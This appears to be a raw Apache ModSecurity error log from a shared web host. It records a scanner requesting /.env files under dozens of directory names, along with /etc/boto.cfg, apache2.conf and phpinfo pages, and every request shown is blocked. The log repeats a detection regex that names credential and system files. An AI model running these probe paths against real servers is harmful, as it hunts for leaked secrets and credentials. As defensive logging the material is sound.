[Tue May 26 15:25:21.769711 2026] [security2:error] [pid 707292:tid 707524] [client 199.45.154.141:53678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 141.154.45.199.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "groupemf.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahVuCdKAqlRPSIEFAut_lQAAAOs"]
[Tue May 26 15:25:21.780122 2026] [security2:error] [pid 707292:tid 707487] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/development/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_mwAAAMY"]
[Tue May 26 15:25:21.938546 2026] [security2:error] [pid 707292:tid 707482] [client 195.178.110.199:53494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/erp/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_qwAAAME"]
[Tue May 26 15:25:21.997507 2026] [security2:error] [pid 707292:tid 707532] [client 195.178.110.199:46566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/dev/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_rwAAAPM"]
[Tue May 26 15:25:22.275519 2026] [security2:error] [pid 707292:tid 707435] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVuCtKAqlRPSIEFAut_xAAAAJI"]
[Tue May 26 15:25:22.318562 2026] [security2:error] [pid 707292:tid 707522] [client 195.178.110.199:53532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/etc/boto.cfg"] [unique_id "ahVuCtKAqlRPSIEFAut_yAAAAOk"]
[Tue May 26 15:25:22.319770 2026] [security2:error] [pid 707292:tid 707460] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/frontend/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_yQAAAKs"]
[Tue May 26 15:25:22.337086 2026] [security2:error] [pid 707292:tid 707437] [client 195.178.110.199:46598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/fe/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_ywAAAJQ"]
[Tue May 26 15:25:22.447390 2026] [security2:error] [pid 707292:tid 707456] [client 195.178.110.199:46620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/front/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_2AAAAKc"]
[Tue May 26 15:25:22.484371 2026] [security2:error] [pid 707292:tid 707480] [client 195.178.110.199:46680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/info.php"] [unique_id "ahVuCtKAqlRPSIEFAut_3AAAAL8"]
[Tue May 26 15:25:22.486819 2026] [security2:error] [pid 707292:tid 707545] [client 195.178.110.199:46598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/infophp.php"] [unique_id "ahVuCtKAqlRPSIEFAut_3QAAAQA"]
[Tue May 26 15:25:22.491156 2026] [security2:error] [pid 707292:tid 707442] [client 195.178.110.199:53494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/infos.php"] [unique_id "ahVuCtKAqlRPSIEFAut_3gAAAJk"]
[Tue May 26 15:25:22.539253 2026] [security2:error] [pid 707292:tid 707488] [client 20.104.227.76:4310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.shahvishaal.moes-art.com"] [uri "/inputs.php"] [unique_id "ahVuCtKAqlRPSIEFAut_5AAAAMc"]
[Tue May 26 15:25:22.594814 2026] [security2:error] [pid 707292:tid 707527] [client 195.178.110.199:53520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/laravel/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_6AAAAO4"]
[Tue May 26 15:25:22.597116 2026] [security2:error] [pid 707292:tid 707485] [client 195.178.110.199:46620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/lms/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_6QAAAMQ"]
[Tue May 26 15:25:22.711309 2026] [security2:error] [pid 707292:tid 707501] [client 195.178.110.199:46638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/market/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_8QAAANQ"]
[Tue May 26 15:25:22.739275 2026] [security2:error] [pid 707292:tid 707422] [client 195.178.110.199:53510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/marketing/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_8gAAAIU"]
[Tue May 26 15:25:22.840655 2026] [security2:error] [pid 707292:tid 707470] [client 195.178.110.199:32814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/local/.env"] [unique_id "ahVuCtKAqlRPSIEFAut_-AAAALU"]
[Tue May 26 15:25:22.884519 2026] [security2:error] [pid 707292:tid 707494] [client 195.178.110.199:53510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node-api/.env"] [unique_id "ahVuCtKAqlRPSIEFAuuAAAAAAM0"]
[Tue May 26 15:25:22.932634 2026] [security2:error] [pid 707292:tid 707491] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/api/.env"] [unique_id "ahVuCtKAqlRPSIEFAuuAAgAAAMo"]
[Tue May 26 15:25:22.951557 2026] [security2:error] [pid 707292:tid 707445] [client 195.178.110.199:46620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/backend/.env"] [unique_id "ahVuCtKAqlRPSIEFAuuABAAAAJw"]
[Tue May 26 15:25:22.959155 2026] [security2:error] [pid 707292:tid 707518] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/media/.env"] [unique_id "ahVuCtKAqlRPSIEFAuuABQAAAOU"]
[Tue May 26 15:25:22.999110 2026] [security2:error] [pid 707292:tid 707426] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/nodeweb/.env"] [unique_id "ahVuCtKAqlRPSIEFAuuABgAAAIk"]
[Tue May 26 15:25:23.009438 2026] [autoindex:error] [pid 707292:tid 707530] [client 144.91.96.80:50380] AH01276: Cannot serve directory /home2/aarindhr/public_html/rohiniventures.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:25:23.030450 2026] [security2:error] [pid 707292:tid 707459] [client 195.178.110.199:53510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/old/.env"] [unique_id "ahVuC9KAqlRPSIEFAuuACwAAAKo"]
[Tue May 26 15:25:23.072823 2026] [security2:error] [pid 707292:tid 707539] [client 195.178.110.199:46638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/new/.env"] [unique_id "ahVuC9KAqlRPSIEFAuuAEAAAAPo"]
[Tue May 26 15:25:23.096728 2026] [security2:error] [pid 707292:tid 707472] [client 195.178.110.199:46622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/.env"] [unique_id "ahVuC9KAqlRPSIEFAuuAEgAAALc"]
[Tue May 26 15:25:23.214711 2026] [security2:error] [pid 707292:tid 707499] [client 195.178.110.199:53544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/nodeapi/.env"] [unique_id "ahVuC9KAqlRPSIEFAuuAGgAAANI"]
[Tue May 26 15:25:23.297946 2026] [security2:error] [pid 707292:tid 707509] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuCtKAqlRPSIEFAut__gAAANw"]
[Tue May 26 15:25:23.316007 2026] [security2:error] [pid 707292:tid 707521] [client 195.178.110.199:53532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/opt/.env"] [unique_id "ahVuC9KAqlRPSIEFAuuAIwAAAOg"]
[Tue May 26 15:25:23.742045 2026] [security2:error] [pid 707292:tid 707547] [client 195.178.110.199:46622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php-info.php"] [unique_id "ahVuC9KAqlRPSIEFAuuASQAAAQI"]
[Tue May 26 15:25:23.814831 2026] [security2:error] [pid 707292:tid 707482] [client 195.178.110.199:53532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php_info.php"] [unique_id "ahVuC9KAqlRPSIEFAuuASgAAAME"]
[Tue May 26 15:25:23.870251 2026] [security2:error] [pid 707292:tid 707532] [client 195.178.110.199:46608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/phpinfo.php"] [unique_id "ahVuC9KAqlRPSIEFAuuATQAAAPM"]
[Tue May 26 15:25:24.023998 2026] [security2:error] [pid 707292:tid 707516] [client 195.178.110.199:53520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/product/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAYAAAAOM"]
[Tue May 26 15:25:24.094442 2026] [security2:error] [pid 707292:tid 707450] [client 195.178.110.199:53510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/production/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAYgAAAKE"]
[Tue May 26 15:25:24.164287 2026] [security2:error] [pid 707292:tid 707542] [client 195.178.110.199:53516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/project/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAaAAAAP0"]
[Tue May 26 15:25:24.213513 2026] [security2:error] [pid 707292:tid 707443] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/portal/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAaQAAAJo"]
[Tue May 26 15:25:24.240105 2026] [security2:error] [pid 707292:tid 707504] [client 195.178.110.199:53510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public-api/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAagAAANc"]
[Tue May 26 15:25:24.277090 2026] [security2:error] [pid 707292:tid 707446] [client 195.178.110.199:60930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/public/phpinfo.php"] [unique_id "ahVuDNKAqlRPSIEFAuuAawAAAJ0"]
[Tue May 26 15:25:24.285915 2026] [security2:error] [pid 707292:tid 707463] [client 195.178.110.199:46566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/prod/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAbAAAAK4"]
[Tue May 26 15:25:24.321873 2026] [security2:error] [pid 707292:tid 707452] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public_html/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAbgAAAKM"]
[Tue May 26 15:25:24.385028 2026] [security2:error] [pid 707292:tid 707460] [client 195.178.110.199:53510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php.php"] [unique_id "ahVuDNKAqlRPSIEFAuuAcwAAAKs"]
